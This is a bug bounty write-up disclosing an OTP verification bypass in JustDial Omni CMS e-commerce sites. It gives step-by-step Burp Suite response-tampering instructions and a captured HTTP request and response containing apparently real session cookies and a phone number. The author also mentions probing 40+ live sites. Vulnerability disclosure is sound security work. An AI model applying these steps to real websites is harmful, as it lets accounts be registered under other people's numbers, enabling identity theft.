Story of a reserved CVE-2022–23361
Hello hackers, hope you guys are doing well and hunting lots of bugs. This is gonna be my first write-up, as the title says I will tell you how I almost managed to get the CVE for the OTP bypass vulnerability which leads to bypass the mobile number verification process on all the websites built with the “Just Dial Omni” CMS.
One fine day I was scrolling on instagram watching reels, I saw an advertisement of a restaurant in my city and I visited their website (they were providing 50% discount on biryani, that’s why I could not controlled my hands and ended up with bypassing their OTP mechanism, instead of ordering biryani), I was simply browsing the website and after some time website started forcing me to do login, I can’t proceed further without login (I was like-
So after seeing this, I decided to create an account on it, we can register our self with the phone number it sends 4 digits OTP to verify the number. When I saw this first thing which comes in my mind was “Let’s check how robust their OTP verification mechanism is” I totally forgot about the biryani at that time😂. I used builtwith to get the overview of the technologies behind the website and I came to know that it is built with Just dial Omni CMS.
I am sharing the complete POC below, it is very clear one can easily understand it and I have mentioned a github link where you can find the video POC as well. I reported this to Just dial and they said it is not in their bug bounty program’s scope Lol!! :) so I decided to test more websites which are using the same Just dial omni and to my surprise all the 40+ websites that I have tested were found vulnerable, after testing all these websites I thought why not report this to Mitre and I did the same.
POC
Vulnerability: OTP bypass
Platform: JustDial Omni CMS
Vulnerable endpoint: https://vulnerable-website/functions/market/ajxgrocpharmaction.php
Severity Level: High
Description: By using JDOmni CMS, one can build a fully functional E-commerce website, which have login and registering functionality one can register an account by using their Mobile Number, when someone tries to register he/she has to verify their phone number before going forward so an attacker can bypass the verification process by manipulating the response and can register with anyone’s phone number which leads to identity theft.
Steps to Reproduce:
1. Open vulnerable website
2. Click on signup
3. Enter mobile number and click on "continue"
4. Enter any 4 digits number in otp field
5. Click on continue and capture that request into burp suite
6. Click on do intercept and forward the request
7. Now change the value of "match" field from "false to "true" in response and forward the response
8. You will get the next screen with registration form
9. Fill the required details
You will see account is created successfully
Impact: An attacker can create accounts by using someone else's mobile number which leads to identity theft. All the websites built with JDOmni CMS are vulnerable.
HTTP Request:
POST /functions/market/ajxgrocpharmaction.php HTTP/1.1
Host: www.vulnerable-website.com
Cookie: webtype=undefined; googtrans=/en/en; googtrans=/en/en; NSSESSION=s%3AaA4VKiwetYg5AGBT-sQ7ZoK5DdpOPAvt.k9m6maUO7EZ6dasR407vqK5nzzXAdOwew7g2k%2FAizFs; PHPWEBSTORESESSION=aA4VKiwetYg5AGBT-sQ7ZoK5DdpOPAvt; _ga=GA1.2.498552079.1646155287; _gid=GA1.2.520074234.1646155287; _gat_gtag_UA_117667564_1=1; TawkConnectionTime=0; __tawkuuid=e::maharashtrasales.com::lvzfcZO2blVe1zXOvEDPv3ZerCmgVa7J7Q36WU96ooOMcutd3u19ql4lz1u56pcU::2; vrfycode__7355246098=2022-03-01+22%3A51%3A28
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 193
Origin: https://www.vulnerable-website.com
Referer: https://www.vulnerable-website.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
action=verifyOtp&data=%7B%22supid%22%3A51325%2C%22mobile%22%3A%227355246098%22%2C%22vcode%22%3A%2211-11%22%2C%22action%22%3A%22verifyOtp%22%2C%22from%22%3A%22signup%22%2C%22loginState%22%3A1%7D
HTTP Response:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2022 17:35:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Access-Control-Allow-Origin: http://gammatesting.jdseller.com
Content-Length: 177
{"results":{"islimit":false,"sent":false,"displaytimer":"","match":false,"expire":true,"check_date":"","token":"","vCodeFailCnt":9},"errors":{"code":0,"msg":""}}
Hope you guys enjoyed this write-up, this was my first write-up your feedbacks and suggestions are most welcome.
Link for video poc — https://github.com/ViNi0608/CVE-2022-23361
You can find me on:-
Instagram — https://www.instagram.com/vineet_singh08/
Linkedin — https://www.linkedin.com/in/vineetsingh08
Twitter — https://twitter.com/vineet__singh08/